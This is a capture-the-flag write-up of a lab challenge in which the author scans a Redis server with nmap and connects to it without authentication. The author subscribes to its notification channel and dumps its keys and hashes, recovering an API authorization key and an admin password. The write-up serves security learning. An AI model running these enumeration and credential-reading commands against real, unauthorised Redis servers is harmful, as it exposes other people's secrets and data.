SINCON Wonderland CTF — Network Recon (Points: 100)

A web application uses Redis server as the database server. The attacker has sneaked into the network on which the Redis server is present.

Please answer the following questions:

1. What message is being published on the active channel of the Redis server?

2. Find the key which contains the hash field ‘authorization_key’.

3. Find the value of hash field ‘admin_password’ stored at the ‘settings’ key.

root@attackdefense:~# nmap 192.177.193.3 -p 6379
Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-02 03:13 UTC
Nmap scan report for target-1 (192.177.193.3)
Host is up (0.000036s latency).
PORT     STATE SERVICE
6379/tcp open  redis
MAC Address: 02:42:C0:B1:C1:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

verified that redis port is open, will now try to connect and look around

root@attackdefense:~# redis-cli  -h 192.177.193.3
192.177.193.3:6379> info
# Server
redis_version:5.0.4
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:21338beea4f0313b
redis_mode:standalone
os:Linux 5.4.0-1030-aws x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:5.4.0
...
# Keyspace
db0:keys=10,expires=0,avg_ttl=0
192.177.193.3:6379> pubsub channels *
1) "notifications"

there is 1 db and a notifications channel

to solve the first flag, subscribe to the channel to get the answer

192.177.193.3:6379> subscribe notifications
Reading messages... (press Ctrl-C to quit)
1) "subscribe"
2) "notifications"
3) (integer) 1
1) "message"
2) "notifications"
3) "Password for user 'admin' was updated."
1) "message"
2) "notifications"
3) "Password for user 'admin' was updated."
1) "message"
2) "notifications"
3) "Password for user 'admin' was updated."
1) "message"
2) "notifications"
3) "Password for user 'admin' was updated."
^C

now to find out what keys are available to solve the second flag. i guessed that the authorization key is probably stored in the config key (spoiler: i am right). question 2 & 3 solved.

192.177.193.3:6379> keys *
 1) "active_api_keys"
 2) "data"
 3) "blacklisted-ip"
 4) "is-offline"
 5) "statistics"
 6) "home_page"
 7) "greetings"
 8) "config"
 9) "users"
10) "settings"
192.177.193.3:6379> get greetings
"Welcome to Attack Defense Recon Basic Badge Challenge."
192.177.193.3:6379> get config
(error) WRONGTYPE Operation against a key holding the wrong kind of value
192.177.193.3:6379> hgetall config
 1) "authorization_key"
 2) "d9bd6d9150d3f7004830819da569aa9a"
 3) "endpoint"
 4) "api.recon-badge.local/private"
 5) "parameter"
 6) "data"
 7) "method"
 8) "POST"
 9) "parameter_type"
10) "json"
192.177.193.3:6379> hgetall settings
 1) "username"
 2) "admin"
 3) "contact-no"
 4) "4123454165"
 5) "role"
 6) "sys_admin"
 7) "admin_password"
 8) "superSecretPass@123"
 9) "last_login"
10) "12/06/2019"
11) "email"
12) "admin@recon-badge.local"